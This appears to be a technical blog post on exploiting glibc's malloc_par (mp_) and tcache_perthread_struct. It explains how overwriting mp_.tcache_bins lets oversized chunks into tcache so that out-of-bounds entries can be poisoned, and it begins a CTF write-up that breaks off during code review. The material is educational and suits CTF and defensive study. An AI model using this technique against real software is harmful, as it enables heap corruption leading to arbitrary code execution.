TL;DR

Targeting mp_ (the global instance of malloc_par) is a high-level exploitation strategy that remains effective even against modern versions of Glibc. In this post, we'll take a focused dive into critical heap-related structures — malloc_par, tcache_perthread_struct, and their key members — to understand how subtle corruption of global configuration can influence thread-local allocation behavior. I'll demonstrate how this knowledge can be weaponized with two pwn challenge writeups centered on this technique.

This post references the latest released version of Glibc 2.41 for analysis as of the date of writing.

Prerequisites

To exploit malloc_par and influence heap behavior (e.g., bypassing tcache limits or poisoning allocation logic), certain conditions are typically required:

1. Write Primitive

We don't necessarily need a full arbitrary write to exploit mp_; a semi-arbitrary or constrained write is often sufficient. When targeting mp_.tcache_bins, the exact value written rarely matters: the goal is simply to set the field to a large value so that the tcache bin limit no longer applies.

This makes the attack feasible via techniques like the Largebin Attack, which lets an attacker write a heap address (a large number, as far as the allocator is concerned) into an arbitrary memory location such as the mp_.tcache_bins field.

The details of manipulating the value of mp_.tcache_bins are explained later.

2. Leak Libc

To exploit a Glibc internal structure like mp_, the first step is to leak the libc base address, of course. Once the base is known, the address of mp_ can be calculated using its known offset within the specific libc version in use:

mp_ = libc_base + offset_to_mp_

3. Tcache Enabled

This technique relies on tcache being in use, so the target must run Glibc 2.26+ (when tcache was introduced) and must not have disabled tcache through a tunable such as:

GLIBC_TUNABLES=glibc.malloc.tcache_count=0

This is rarely a limitation in practice: tcache is built into Glibc's malloc and enabled by default because it significantly improves allocation performance, so it is active unless explicitly suppressed.

Tcache Structures

To gain control over Tcache Bin allocation by exploiting internal Glibc structures, we must first understand what these structures are and how they work. In this section, we focus on two critical components defined in malloc.c from the Glibc 2.41 source:

- malloc_par (accessed globally as mp_)

- tcache_perthread_struct (thread-local tcache state)

Structure: malloc_par

The malloc_par structure holds global allocator parameters used by ptmalloc, the malloc implementation in Glibc. Unlike malloc_state, which is per-arena, malloc_par is shared across all arenas and guides global memory management behavior.

It's defined in Glibc 2.41 source under the file malloc/malloc.c at line 1858:

struct malloc_par

{

/* Tunable parameters */

unsigned long trim_threshold;

INTERNAL_SIZE_T top_pad;

INTERNAL_SIZE_T mmap_threshold;

INTERNAL_SIZE_T arena_test;

INTERNAL_SIZE_T arena_max;

/* Transparent Large Page support. */

INTERNAL_SIZE_T thp_pagesize;

/* A value different than 0 means to align mmap allocation to hp_pagesize

add hp_flags on flags. */

INTERNAL_SIZE_T hp_pagesize;

int hp_flags;

/* Memory map support */

int n_mmaps;

int n_mmaps_max;

int max_n_mmaps;

/* the mmap_threshold is dynamic, until the user sets

it manually, at which point we need to disable any

dynamic behavior. */

int no_dyn_threshold;

/* Statistics */

INTERNAL_SIZE_T mmapped_mem;

INTERNAL_SIZE_T max_mmapped_mem;

/* First address handed out by MORECORE/sbrk. */

char *sbrk_base;

#if USE_TCACHE

/* Maximum number of buckets to use. */

size_t tcache_bins;

size_t tcache_max_bytes;

/* Maximum number of chunks in each bucket. */

size_t tcache_count;

/* Maximum number of chunks to remove from the unsorted list, which

aren't used to prefill the cache. */

size_t tcache_unsorted_limit;

#endif

};

This structure provides centralized configuration for heap behavior, including:

- mmap controls

- sbrk tracking

- THP (Transparent Huge Page) support

- Tcache policies, the part that matters for tcache exploitation, wrapped under the #if USE_TCACHE macro

Here's a quick overview of the tcache-related fields:

| Field | Description |
|---|---|
| tcache_bins | Number of tcache bins (64 by default) |
| tcache_max_bytes | Maximum chunk size allowed in tcache |
| tcache_count | Maximum number of chunks per bin |
| tcache_unsorted_limit | Maximum number of unsorted-bin chunks malloc() processes while filling the tcache (0 means no limit) |

In the Glibc implementation, only one instance of malloc_par exists globally: the mp_ structure. It is defined in the same file at line 1915:

/* There is only one instance of the malloc parameters. */

static struct malloc_par mp_ =

{

.top_pad = DEFAULT_TOP_PAD,

.n_mmaps_max = DEFAULT_MMAP_MAX,

.mmap_threshold = DEFAULT_MMAP_THRESHOLD,

.trim_threshold = DEFAULT_TRIM_THRESHOLD,

#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))

.arena_test = NARENAS_FROM_NCORES (1)

#if USE_TCACHE

,

.tcache_count = TCACHE_FILL_COUNT,

.tcache_bins = TCACHE_MAX_BINS,

.tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),

.tcache_unsorted_limit = 0 /* No limit. */

#endif

};

This mp_ structure typically resides in the writable .data section of libc (on architectures like x86_64) and is statically initialized, so it is already populated when the program starts. By default, its fields are initialized using constants defined directly in the Glibc source.

For example, TCACHE_FILL_COUNT, defined at line 311, controls how many chunks can be cached in each tcache bin:

/* This is another arbitrary limit, which tunables can change. Each

tcache bin will hold at most this number of chunks. */

# define TCACHE_FILL_COUNT 7

Similarly, TCACHE_MAX_BINS, defined at line 293, sets the number of bin slots available in the tcache:

/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */

# define TCACHE_MAX_BINS 64

# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)

Here, we can see that mp_.tcache_bins is initialized to TCACHE_MAX_BINS, and mp_.tcache_max_bytes is computed using the macro tidx2usize, which resolves to the largest user size that can be handled by tcache.
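To make the default value of mp_.tcache_max_bytes concrete, here is a minimal Python sketch of the tidx2usize computation. The macro body is not quoted in this post, so the formula below (idx * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ) is reproduced from memory of malloc.c and should be treated as an assumption, as should the 64-bit constants.

```python
# Assumed 64-bit constants: SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 32.
SIZE_SZ = 8
MALLOC_ALIGNMENT = 2 * SIZE_SZ
MINSIZE = 0x20
TCACHE_MAX_BINS = 64


def tidx2usize(idx: int) -> int:
    """Largest user-visible size served by tcache bin `idx` (assumed macro body)."""
    return idx * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ


# Default initializer of mp_.tcache_max_bytes: tidx2usize(TCACHE_MAX_BINS - 1)
default_tcache_max_bytes = tidx2usize(TCACHE_MAX_BINS - 1)
print(hex(default_tcache_max_bytes))  # 0x408
```

Under these assumptions the default limit is 0x408 bytes of user data, which corresponds to the 0x410 chunk size of the last default bin.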

The final tcache-related member, mp_.tcache_unsorted_limit, caps how many unsorted-bin chunks malloc() will process while it is filling the tcache before it simply returns a cached chunk. By default, it is set to 0, meaning no limit is enforced unless explicitly changed.

As an extra tip: tcache and mp_ behavior is not controlled through the compiler (e.g., gcc). Glibc exposes runtime tunables rather than compile-time options for end users, so we can modify tcache behavior by setting an environment variable at runtime. For example:

# Disable tcache
GLIBC_TUNABLES=glibc.malloc.tcache_count=0 ./binary

# Shrink the tcache size range (the bin count is derived from tcache_max; there is no separate tcache_bins tunable)
GLIBC_TUNABLES=glibc.malloc.tcache_max=256 ./binary

As you can see, an attacker who is able to modify fields in mp_ at runtime can influence the behavior of all tcache operations across threads.

Structure: tcache_perthread_struct

If mp_ is the target we aim to corrupt, why should we care about another structure like tcache_perthread_struct?

Because this thread-local structure is where the real impact of the mp_ overwrite plays out.

The tcache_perthread_struct holds the actual freelists for tcache allocations. It exists per-thread, meaning each thread gets its own copy. This structure is allocated the first time a thread performs a malloc() (triggering tcache_init()), and it lives on the heap as a normal malloc() chunk.

In Linux, each thread has its own independent stack, thread-local storage (TLS), and CPU registers, but shares the same heap, global/static variables, file descriptors, and memory mappings with other threads in the process. This shared memory model is why corrupting global structures like mp_ can affect heap behavior across all threads.

Again, mp_ is not thread-local: it is a single global structure shared by all threads in the process. In contrast, tcache_perthread_struct is per-thread: the tcache pointer that refers to it is declared with the __thread storage specifier, so each thread has its own instance.

It's defined at line 3115:

/* There is one of these for each thread, which contains the

per-thread cache (hence "tcache_perthread_struct"). Keeping

overall size low is mildly important. Note that COUNTS and ENTRIES

are redundant (we could have just counted the linked list each

time), this is for performance reasons. */

typedef struct tcache_perthread_struct

{

uint16_t counts[TCACHE_MAX_BINS];

tcache_entry *entries[TCACHE_MAX_BINS];

} tcache_perthread_struct;

This structure contains:

- counts[]: Number of cached chunks per bin

- entries[]: Pointers to the head of each tcache freelist (a singly-linked list of freed chunks)

Each tcache bin corresponds to a size class (e.g., 0x20, 0x30, ..., up to the tcache limit), and counts[i] records how many entries are currently cached in that bin, stored as a 2-byte uint16_t.

The tcache_entry structure, defined at line 3106, describes how a freed chunk is stored in a tcache bin. Unlike traditional bin chunks (e.g., fastbin or unsorted bin), whose freelist pointers (fd/bk) point to the chunk header (starting at prev_size), the next pointer in a tcache_entry points directly to the user data region of the next chunk, i.e., the address returned by malloc().

/* We overlay this structure on the user-data portion of a chunk when

the chunk is stored in the per-thread cache. */

typedef struct tcache_entry

{

struct tcache_entry *next;

/* This field exists to detect double frees. */

uintptr_t key;

} tcache_entry;

If you're familiar with GDB and heap exploitation in pwn CTFs, you've probably noticed that there's often a 0x290-sized chunk sitting at the start of the heap when a binary starts executing (though not always). So, what is it?

That chunk corresponds to the tcache_perthread_struct, the thread-local structure Glibc uses to manage fast allocations and deallocations through tcache bins.

To understand its layout, we’ll assume the default values configured by mp_ (i.e., the malloc_par structure):

- TCACHE_MAX_BINS = 64

- sizeof(uint16_t) = 2 bytes

- sizeof(tcache_entry *) = 8 bytes (on x86_64)

So the size of tcache_perthread_struct becomes:

typedef struct tcache_perthread_struct

{

uint16_t counts[TCACHE_MAX_BINS]; // 64 * 2 bytes = 128 bytes

tcache_entry *entries[TCACHE_MAX_BINS]; // 64 * 8 bytes = 512 bytes (on 64-bit)

} tcache_perthread_struct;

This totals 0x280 bytes, but since it is allocated with _int_malloc() inside tcache_init() (defined at line 3306), it is stored as a standard heap chunk and therefore carries a chunk header. The header follows the usual malloc_chunk structure, defined at line 1138:

struct malloc_chunk {

INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */

INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */

struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */

struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */

struct malloc_chunk* bk_nextsize;

};

However, for allocated chunks, only the first two fields (prev_size and size) are relevant; the rest are used only for free chunks. This means the actual payload (our tcache_perthread_struct) begins immediately after the 0x10-byte header, which gives the classic 0x290-byte chunk.
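The size arithmetic above can be double-checked with a small ctypes model. This is only a sketch: the class name is made up for illustration, and fixed-width integer types are used so that the x86_64 layout is modeled regardless of the machine running the script.

```python
import ctypes

TCACHE_MAX_BINS = 64
CHUNK_HEADER_SIZE = 0x10  # prev_size + size on 64-bit


class TcachePerthreadStruct(ctypes.Structure):
    """Illustrative model of tcache_perthread_struct on x86_64."""
    _fields_ = [
        ("counts", ctypes.c_uint16 * TCACHE_MAX_BINS),   # 64 * 2 bytes
        ("entries", ctypes.c_uint64 * TCACHE_MAX_BINS),  # 64 * 8 bytes (pointers)
    ]


struct_size = ctypes.sizeof(TcachePerthreadStruct)
chunk_size = struct_size + CHUNK_HEADER_SIZE

print(hex(struct_size))                            # 0x280
print(hex(TcachePerthreadStruct.entries.offset))   # 0x80 (0x90 once the header is counted)
print(hex(chunk_size))                             # 0x290
```

The size field seen in GDB is 0x291 rather than 0x290 because the lowest bit carries the PREV_INUSE flag.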

Here's what a GDB memory dump might look like right after tcache_perthread_struct is initialized:

0x555555559000: 0x0000000000000000 0x0000000000000291 <-- chunk header

0x555555559010: 0x0000000000000000 0x0000000000000000 <-- tcache_perthread_struct

^ ^

counts[0] counts[1]

So the in-memory layout of the chunk holding tcache_perthread_struct looks like:

struct tcache_perthread_struct {

[ 0x000 - 0x00F ] chunk header // prev_size & size, 8 * 2 = 0x10 bytes

[ 0x010 - 0x08F ] counts[64] // uint16_t each, 64 × 2 bytes = 0x80 bytes

[ 0x090 - 0x28F ] entries[64] // tcache_entry* each, 64 × 8 bytes = 0x200 bytes

}

Conceptual Heap Layout:

0x0000 ┌────────────────────────────┐

│ Chunk Header │ ← malloc_chunk metadata (not part of struct)

│ - prev_size (8 bytes) │

│ - size (8 bytes) │ ← 8 * 2 = 0x10 / 16 bytes

0x0010 ├────────────────────────────┤

│ counts[0] (2 bytes) │

│ counts[1] (2 bytes) │

│ ... │

│ counts[63] (2 bytes) │ ← 64 * 2 = 0x80 / 128 bytes

0x0090 ├────────────────────────────┤

│ entries[0] (8 bytes) │

│ entries[1] (8 bytes) │

│ ... │

│ entries[63] (8 bytes) │ ← 64 * 8 = 0x200 / 512 bytes

0x0290 └────────────────────────────┘ ← end of `tcache_perthread_struct`

0x0290 ┌────────────────────────────┐

│ Chunk Header │ ← next heap chunk (e.g., malloc(0x100))

│ - prev_size (8 bytes) │

│ - size (8 bytes) │

0x02A0 ├────────────────────────────┤

│ User data... │

│ ... │

│ │

│ │

0x03A0 └────────────────────────────┘ ← allocated size: 0x100

With a clear understanding of how this structure is laid out in memory, we're now ready to explore how it can be manipulated during exploitation, particularly in conjunction with corrupted mp_ fields.

Exploitation Strategy

Hijack mp_.tcache_bins

This section focuses on the exploitation methodology: how modifying specific fields in the mp_ structure can be used to bypass allocator limits, poison tcache bins, and ultimately gain arbitrary memory control.

The following four members of mp_ control how the tcache subsystem behaves on a per-bin and per-size basis:

static struct malloc_par mp_ =

{

[...]

#if USE_TCACHE

.tcache_count = TCACHE_FILL_COUNT, // 7

.tcache_bins = TCACHE_MAX_BINS, // 64

.tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),

.tcache_unsorted_limit = 0 /* No limit. */

#endif

};

First, tcache_count limits the number of chunks that can be cached per tcache bin; by default, this is set to 7. From an attack perspective, overwriting this field with a smaller value can be advantageous when the number of allowable allocations is limited. With a reduced tcache capacity, freed chunks bypass tcache and fall back to fastbins, which often offer a broader attack surface because fastbin chunks tend to be subject to fewer restrictions and integrity checks. Of course, this strategy is only useful when fastbins are still available for the sizes involved.

Second, tcache_bins is a critical target. This field defines the total number of tcache bin entries — one per size class — and is set to 64 by default. On 64-bit systems, this corresponds to chunk sizes up to 0x410; allocations larger than that are normally excluded from tcache and handled through more restrictive mechanisms.

The mapping of tcache bins (when mp_.tcache_bins is set to 64):

| Bin Index | Chunk Size |
|---|---|
| 0 | 0x20 |
| 1 | 0x30 |
| 2 | 0x40 |
| ... | ... |
| 63 | 0x410 |

In Glibc, tcache bins are indexed by chunk size, and the following macros compute the bin index from a given size. For example, csize2tidx is defined at line 300:

/* When "x" is from chunksize(). */

# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

/* When "x" is a user-provided size. */

# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...

idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)

idx 1 bytes 25..40 or 13..20

idx 2 bytes 41..56 or 21..28

etc. */

- x is the chunk size, including metadata and alignment (i.e., from chunksize()).

- MINSIZE is typically 0x20 (32 bytes on 64-bit), the minimum allowed chunk size.

- MALLOC_ALIGNMENT is 0x10 on 64-bit; all chunks are aligned to 16 bytes.

- The + MALLOC_ALIGNMENT - 1 term is the classic integer ceiling trick: it forces the division to round up when needed.

In short, the macro gives the bin index for a given chunk size by subtracting the minimum chunk size (MINSIZE) and dividing by the alignment unit.
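The index computation can be mirrored in a few lines of Python. This is a sketch for 64-bit targets only; request2size is not quoted in this post, so its body below (add SIZE_SZ, round up to the alignment, clamp to MINSIZE) is an assumption based on how the macro is usually described.

```python
SIZE_SZ = 8
MALLOC_ALIGNMENT = 2 * SIZE_SZ          # 0x10 on 64-bit
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1
MINSIZE = 0x20


def request2size(req: int) -> int:
    """Chunk size used for a user request of `req` bytes (assumed macro body)."""
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    return MINSIZE if padded < MINSIZE else padded & ~MALLOC_ALIGN_MASK


def csize2tidx(chunk_size: int) -> int:
    """tcache bin index for a chunk size, as in the csize2tidx macro."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def usize2tidx(req: int) -> int:
    """tcache bin index for a user-provided request size."""
    return csize2tidx(request2size(req))


for size in (0x20, 0x30, 0x410, 0x510):
    print(hex(size), "->", csize2tidx(size))
```

With the default limit of 64 bins, index 63 (chunk size 0x410) is the last valid one; a 0x510 chunk maps to index 0x4f and is only accepted once mp_.tcache_bins has been raised.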

Now, imagine we are able to hijack the value of mp_.tcache_bins. By increasing it beyond its intended maximum (which is 64 by default), we can trick the allocator into treating larger-sized chunks—such as those created by malloc(0x500)—as tcache-eligible.

This opens the door to caching and reusing large chunks that would normally bypass tcache and go through stricter mechanisms like the unsorted bin. Even better, it enables us to poison the freelist for larger chunks with fake entries — a powerful technique when aiming for arbitrary memory write or control over future allocations.

For example, if we overwrite tcache_bins with a large enough value (e.g., a heap address 0x550011223344 via Largebin Attack), then a freed chunk of size 0x510 (after a malloc(0x500)) will be accepted into the tcache:

tidx = (0x510 - 0x20) / 0x10 = 0x4f

This maps to tcache bin index 0x4f, which would normally be out of bounds but is now allowed due to the corrupted tcache_bins.

As a result, the chunk is stored in tcache->entries[0x4f], expanding the effective range of tcache. Recall the tcache_perthread_struct layout on the heap:

0x0000 ┌────────────────────────────┐

│ Chunk Header │ ← malloc_chunk metadata (not part of struct)

│ - prev_size (8 bytes) │

│ - size (8 bytes) │ ← 0x8 * 2 = 0x10 bytes

0x0010 ├────────────────────────────┤

│ counts[0] (2 bytes) │

│ counts[1] (2 bytes) │

│ ... │

│ counts[63] (2 bytes) │ ← 64 * 2 = 0x80 bytes

0x0090 ├────────────────────────────┤

│ entries[0] (8 bytes) │

│ entries[1] (8 bytes) │

│ ... │

│ entries[63] (8 bytes) │ ← 64 * 8 = 0x200 bytes

0x0290 └────────────────────────────┘ ← end of `tcache_perthread_struct`

So:

- counts[0] starts at offset 0x0000 + 0x10 = 0x10 (after the chunk header)

- entries[0] starts at offset 0x90 (i.e., 0x10 + 0x80)

- entries[i] is at offset 0x90 + i * 8

For the out-of-bounds entries[0x4f]:

offset_to_base = 0x90 + 0x4f * 8 = 0x90 + 0x278 = 0x308

Therefore, tcache->entries[0x4f] is located at offset 0x308 from the base of the chunk (which starts at 0x0000):

0x0000 ┌────────────────────────────┐

│ Chunk Header │ ← malloc_chunk metadata (not part of struct)

│ - prev_size (8 bytes) │

│ - size (8 bytes) │ ← 0x8 * 2 = 0x10 bytes

0x0010 ├────────────────────────────┤

│ counts[0] (2 bytes) │

│ counts[1] (2 bytes) │

│ ... │

│ counts[63] (2 bytes) │ ← 64 * 2 = 0x80 bytes

0x0090 ├────────────────────────────┤

│ entries[0] (8 bytes) │

│ entries[1] (8 bytes) │

│ ... │

│ entries[63] (8 bytes) │ ← 64 * 8 = 0x200 bytes

0x0290 └────────────────────────────┘ ← end of `tcache_perthread_struct`

│ Chunk Header │ ← next heap chunk (from malloc(0x500))

│ - prev_size (8 bytes) │

│ - size: 0x511 (8 bytes) │ ← actual chunk size

0x02A0 ├────────────────────────────┤

│ User data... │

│ (size: 0x500) │

│ │

│ │

0x0300 │ ▒▒▒▒▒▒▒▒▒▒▒▒▒│ ← This pointer points to a 0x510 chunk

│ │ now cached in tcache->entries[0x4f]

│ │

│ │

0x07A0 └────────────────────────────┘

At this point, we can calculate the offset from the start of our chunk's user data to the corresponding slot of the (logically extended) entries[] array: the entry at offset 0x308, which holds the pointer for tcache bin index 0x4f (i.e., chunks of size 0x510). Because this slot lies inside memory we control, we can fill it with an address of our choosing, such as that of the __free_hook function pointer (still usable before Glibc 2.34), so that the next allocation from this bin returns that address and lets us overwrite it to achieve arbitrary code execution.
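The offset bookkeeping can be sketched as two small helpers. The function names are hypothetical, and the second helper assumes, as in the diagram above, that the chunk we control is the one placed directly after the 0x290-byte tcache chunk.

```python
HEADER = 0x10               # prev_size + size
COUNTS_SIZE = 64 * 2        # counts[64], uint16_t each
TCACHE_CHUNK_SIZE = 0x290   # tcache_perthread_struct chunk, header included


def entries_offset(tc_idx: int) -> int:
    """Offset of tcache->entries[tc_idx] from the start of the tcache chunk."""
    return HEADER + COUNTS_SIZE + tc_idx * 8


def offset_in_next_chunk(tc_idx: int) -> int:
    """Offset of that slot inside the user data of the chunk right after the tcache chunk."""
    slot = entries_offset(tc_idx)
    user_data_start = TCACHE_CHUNK_SIZE + HEADER
    if slot < user_data_start:
        raise ValueError("slot lies inside the tcache chunk or the next chunk's header")
    return slot - user_data_start


print(hex(entries_offset(0x4f)))        # 0x308
print(hex(offset_in_next_chunk(0x4f)))  # 0x68
```

So for a 0x510 chunk, the pointer to plant sits 0x68 bytes into the user data of the first chunk allocated after tcache_perthread_struct.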

As for the other two members, mp_.tcache_max_bytes and mp_.tcache_unsorted_limit, I haven't yet identified a reliable or practical attack path that meaningfully leverages their manipulation. Maybe one day we will come back and extend this section.

Supplementary

As we've seen, tcache_perthread_struct is a fixed-size structure, allocated once per thread and never resized. It contains 64 counts[] and 64 entries[], one for each default tcache bin index (0 to 63). When mp_.tcache_bins is corrupted to a value beyond this intended maximum, the usable range of entries[] (and of counts[]) is extended logically but not physically, which creates a mismatch between the logical and physical bounds in Glibc's allocator behavior.
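One consequence of this mismatch is worth spelling out: an out-of-bounds counts[] index does not land past the structure but inside entries[], because counts[] is only 0x80 bytes long. The sketch below (hypothetical helper names, 64-bit layout assumed) computes which entries[] slot a given counts[tc_idx] overlaps.

```python
HEADER = 0x10
TCACHE_MAX_BINS = 64
ENTRIES_START = HEADER + TCACHE_MAX_BINS * 2  # 0x90 from the chunk base


def counts_offset(tc_idx: int) -> int:
    """Offset of tcache->counts[tc_idx] from the start of the tcache chunk."""
    return HEADER + tc_idx * 2


def counts_alias(tc_idx: int):
    """Return (entries index, byte offset inside that pointer) overlapped by
    counts[tc_idx], or None when tc_idx is within the real counts[] array.
    For very large tc_idx the returned entries index can itself exceed 63."""
    if tc_idx < TCACHE_MAX_BINS:
        return None
    rel = counts_offset(tc_idx) - ENTRIES_START
    return rel // 8, rel % 8


print(hex(counts_offset(0x4f)))  # 0xae
print(counts_alias(0x4f))        # (3, 6)
```

Under these assumptions, counts[0x4f] shares its two bytes with the top two bytes of entries[3], the head pointer of the 0x50 bin. Those bytes are normally zero for user-space pointers on x86_64, so the count reads as 0 until a free() into bin 0x4f increments it.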

tcache_available()

The function tcache_available(), defined at line 3121, validates bin access against the value of mp_.tcache_bins:

/* Check if tcache is available for alloc by corresponding tc_idx. */

static __always_inline bool

tcache_available (size_t tc_idx)

{

if (tc_idx < mp_.tcache_bins

&& tcache != NULL

&& tcache->counts[tc_idx] > 0)

return true;

else

return false;

}

- This function checks whether a bin is eligible for allocation, but only compares against mp_.tcache_bins. It does not check whether tc_idx fits within the physical bounds of the tcache_perthread_struct.

- If tc_idx is out of bounds (but below the inflated mp_.tcache_bins used in the comparison), the counts[tc_idx] lookup becomes an out-of-bounds read that the allocator does not detect.

- The mp_.tcache_max_bytes member mentioned earlier is initialized from the same constant as mp_.tcache_bins (the maximum bin index), and it is not consulted as a check here either.

This makes tcache_get() and tcache_put(), shown below, inherently vulnerable to logic abuse if an attacker controls mp_.tcache_bins.

tcache_put()

When a chunk is freed, it is cached into the tcache via tcache_put(), defined at line 3156:

/* Caller must ensure that we know tc_idx is valid and there's room

for more chunks. */

static __always_inline void

tcache_put (mchunkptr chunk, size_t tc_idx)

{

tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will

detect a double free. */

e->key = tcache_key;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);

tcache->entries[tc_idx] = e;

++(tcache->counts[tc_idx]);

}

If tc_idx > 63 but mp_.tcache_bins was increased (e.g., via a largebin attack), this function will:

- Write the freed chunk's address to tcache->entries[tc_idx]

- Increment tcache->counts[tc_idx]

This causes a heap pointer to be written past the end of tcache_perthread_struct.

tcache_get()

On allocation, Glibc uses tcache_get() to pull a chunk from the freelist, defined at line 3197:

/* Like the above, but removes from the head of the list. */

static __always_inline void *

tcache_get (size_t tc_idx)

{

return tcache_get_n (tc_idx, & tcache->entries[tc_idx]);

}

This reads the pointer at entries[tc_idx] and returns it to the program. If tc_idx is beyond 63 but still less than mp_.tcache_bins, the result is an out-of-bounds read at an attacker-predictable offset, retrieving a "chunk" pointer from outside the bounds of tcache_perthread_struct.

That pointer is then returned by a later malloc() of the matching size, giving the attacker direct control over a future allocation.
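The interplay of the three functions can be illustrated with a toy model. This is a deliberately simplified sketch, not Glibc's code: the heap is a bytearray whose offset 0 is the tcache chunk, the class and method names are invented, the freelist's next pointers and safe-linking are ignored, and the only bound that is checked is tcache_bins, standing in for mp_.tcache_bins.

```python
import struct

HEADER = 0x10
TCACHE_MAX_BINS = 64
COUNTS_OFF = HEADER
ENTRIES_OFF = HEADER + TCACHE_MAX_BINS * 2  # 0x90


class ToyTcache:
    """Toy model: heap[0:0x290] is the tcache chunk, the rest is ordinary heap."""

    def __init__(self, heap_size=0x1000, tcache_bins=TCACHE_MAX_BINS):
        self.heap = bytearray(heap_size)
        self.tcache_bins = tcache_bins  # stands in for mp_.tcache_bins

    def _count(self, idx):
        return struct.unpack_from("<H", self.heap, COUNTS_OFF + idx * 2)[0]

    def _set_count(self, idx, value):
        struct.pack_into("<H", self.heap, COUNTS_OFF + idx * 2, value)

    def available(self, idx):
        # Only the logical limit is checked, never the physical 64-entry bound.
        return idx < self.tcache_bins and self._count(idx) > 0

    def put(self, idx, ptr):
        # As in Glibc, the caller is trusted to have validated idx.
        struct.pack_into("<Q", self.heap, ENTRIES_OFF + idx * 8, ptr)
        self._set_count(idx, self._count(idx) + 1)

    def get(self, idx):
        if not self.available(idx):
            return None
        ptr = struct.unpack_from("<Q", self.heap, ENTRIES_OFF + idx * 8)[0]
        self._set_count(idx, self._count(idx) - 1)
        return ptr


toy = ToyTcache(tcache_bins=666666)       # corrupted limit
toy.put(0x4F, 0x5555000007B0)             # free() of a 0x510 chunk
# The slot lives at heap offset 0x308, i.e. inside an ordinary chunk we can write to.
struct.pack_into("<Q", toy.heap, 0x308, 0x7FFFDEADBEEF)
print(hex(toy.get(0x4F)))                 # 0x7fffdeadbeef
```

With the default limit of 64, the same get(0x4f) call returns None in this model, which is the behavior the overwrite is meant to defeat.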

Summary

The tcache_perthread_struct is statically sized with only 64 entries in both counts[] and entries[]. When mp_.tcache_bins is overwritten to a value beyond this limit, Glibc’s allocator will blindly perform out-of-bounds accesses, treating the extended bin indices as valid — without reallocating or validating the structure bounds.

As previously mentioned, the tcache limits stored in mp_ are tunable parameters intended to be set at runtime. This behavior appears to be by design rather than a flaw, which means this attack surface is likely to remain viable in future versions of Glibc, although mitigations (such as hard-capping the maximum allowed value) could theoretically be introduced.

CTF PoCs

CTF 1: Write A Large Number

Overview

Binary download: link



The first CTF challenge we'll explore demonstrates the exact attack path outlined in the previous section. In this scenario, we cannot directly control which previously allocated chunk is freed, shown, or edited — we are limited to interacting with the newly allocated chunk only. Additionally, we’re given a single-use, constrained write primitive: the ability to write a fixed large number to any memory address of our choosing.

All protections are enabled, but the binary is not stripped:

$ checksec pwn

[*] '/home/Axura/ctf/pwn/ezheap_mp_2.31/pwn'

Arch: amd64-64-little

RELRO: Full RELRO

Stack: Canary found

NX: NX enabled

PIE: PIE enabled

SHSTK: Enabled

IBT: Enabled

Stripped: No

Glibc 2.31 is used for this pwn challenge, so the malloc hooks are still available. The malloc-related hooks (__malloc_hook, __free_hook, __realloc_hook, etc.) were removed from the API in Glibc 2.34, after which malloc no longer calls them.

Code Review

main

int __fastcall main(int argc, const char **argv, const char **envp)

{

int v4; // [rsp+4h] [rbp-Ch] BYREF

unsigned __int64 v5; // [rsp+8h] [rbp-8h]

v5 = __readfsqword(0x28u);

((void (__fastcall *)(int, const char **, const char **))init)(argc, argv, envp);

while ( 1 )

{

menu();

__isoc99_scanf("%d", &v4);

switch ( v4 )

{

case 1:

add();

break;

case 2:

delete();

break;

case 3:

edit();

break;

case 4:

show();

break;

case 5:

puts("bye");

exit(0);

default:

continue;

}

}

}

The program enters an infinite loop displaying a menu. It reads an integer (v4) as the user's choice and dispatches on it:

- 1: Call add()

- 2: Call delete()

- 3: Call edit()

- 4: Call show()

- 5: Print "bye" and exit

Any invalid input causes the menu to repeat without action.

add

unsigned __int64 add()

{

int chunk_idx; // ebx

int ptr_idx; // ebx

char buf[24]; // [rsp+0h] [rbp-30h] BYREF

unsigned __int64 v4; // [rsp+18h] [rbp-18h]

v4 = __readfsqword(0x28u);

if ( (unsigned int)global_idx > 0x20 )

exit(0);

if ( *((_QWORD *)&chunks + global_idx) )

{

puts("error");

exit(0);

}

puts("Size :");

read(0, buf, 8u);

if ( atoi(buf) > 0x1000 || atoi(buf) <= 0x90 ) // ban fastbin chunks

{

puts("error");

exit(1);

}

chunk_idx = global_idx;

len_array[chunk_idx] = atoi(buf);

ptr_idx = global_idx;

*((_QWORD *)&chunks + ptr_idx) = malloc((int)len_array[global_idx]);

puts("Content :");

read(0, *((void **)&chunks + global_idx), len_array[global_idx]);

++global_idx;

return __readfsqword(0x28u) ^ v4;

}

This function allows the user to allocate a heap chunk under the following conditions:

- Index limit check:
  - global_idx must be ≤ 0x20.
  - If the slot at chunks[global_idx] is already used, exit with error.

- User input (size):
  - Reads 8 bytes into a buffer, parses it with atoi().
  - Size must be between 0x91 and 0x1000 (excludes fastbins).

- Chunk allocation:
  - Saves the size to len_array[global_idx].
  - Allocates a heap chunk and stores the pointer in chunks[global_idx].

- User input (content):
  - Reads content into the allocated chunk (size-controlled).

- Increments global_idx.

global_idx only ever increases, so a slot index is never reused.

delete

unsigned __int64 delete()

{

int ptr_idx_array[27]; // [rsp+Ch] [rbp-74h] BYREF

unsigned __int64 v2; // [rsp+78h] [rbp-8h]

v2 = __readfsqword(0x28u);

puts("Index :");

__isoc99_scanf("%d", ptr_idx_array);

